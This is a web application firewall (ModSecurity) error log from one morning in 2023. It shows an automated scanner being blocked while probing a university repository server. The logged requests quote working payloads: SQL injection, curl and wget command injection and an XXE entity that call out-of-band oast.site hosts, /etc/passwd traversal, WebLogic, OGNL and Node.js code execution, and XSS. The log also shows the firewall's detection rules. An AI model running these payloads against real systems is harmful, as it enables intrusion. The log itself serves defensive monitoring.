[Tue Aug 29 11:31:38.429644 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAN@5HoAAAAO"]
[Tue Aug 29 11:31:38.671195 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgog88w6nzhfuyj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQDFUUAAAAl"]
[Tue Aug 29 11:31:39.399591 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgmwokcjd5o61rr.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQNwHEAAAAv"]
[Tue Aug 29 11:31:40.391603 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQR46gAAAAz"]
[Tue Aug 29 11:31:41.608452 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAP5mJ0AAAAM"]
[Tue Aug 29 11:31:43.355482 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQDFU4AAAAl"]
[Tue Aug 29 11:31:44.327722 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQNwHwAAAAv"]
[Tue Aug 29 11:31:44.342453 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQV4O4AAAA3"]
[Tue Aug 29 11:31:44.360453 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQJWwcAAAAr"]
[Tue Aug 29 11:31:44.382465 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repository.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQSWN4AAAA0"]
[Tue Aug 29 11:31:44.382499 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQSWN4AAAA0"]
[Tue Aug 29 11:31:45.445395 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQFcUQAAAAn"]
[Tue Aug 29 11:31:45.472187 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgqkts9p39bq5og.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAP5mKYAAAAM"]
[Tue Aug 29 11:31:46.392087 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAANWgVIAAAAG"]
[Tue Aug 29 11:31:47.424358 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQSWOkAAAA0"]
[Tue Aug 29 11:31:47.427875 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAANWgVUAAAAG"]
[Tue Aug 29 11:31:49.305389 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQSWO4AAAA0"]
[Tue Aug 29 11:31:50.313303 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP8G1wAAAAV"]
[Tue Aug 29 11:31:50.320175 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP@M3MAAAAZ"]
[Tue Aug 29 11:31:51.301560 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg9dnobpey6p8f7.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgykk7ig6dgfja9.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAQNwJIAAAAv"]
[Tue Aug 29 11:31:51.333502 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQMrwwAAAAu"]
[Tue Aug 29 11:31:51.371429 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAP6NQoAAAAQ"]
[Tue Aug 29 11:31:51.374828 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAN@5KEAAAAO"]
[Tue Aug 29 11:31:52.385395 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg7bk7j5w7uxfb3.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgjrokhxhatr5cn.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAN@5KYAAAAO"]
[Tue Aug 29 11:31:52.628861 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAPDn@kAAAAP"]
[Tue Aug 29 11:31:53.330229 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAPiBmoAAAAB"]
[Tue Aug 29 11:31:53.460669 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAAN@5LMAAAAO"]
[Tue Aug 29 11:31:54.376103 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAQJWx4AAAAr"]
[Tue Aug 29 11:31:55.435947 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAPDn-kAAAAP"]
[Tue Aug 29 11:31:56.371771 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAAQkBZcAAAAC"]
[Tue Aug 29 11:31:56.380156 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg87crrz6kueayq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQV4RMAAAA3"]
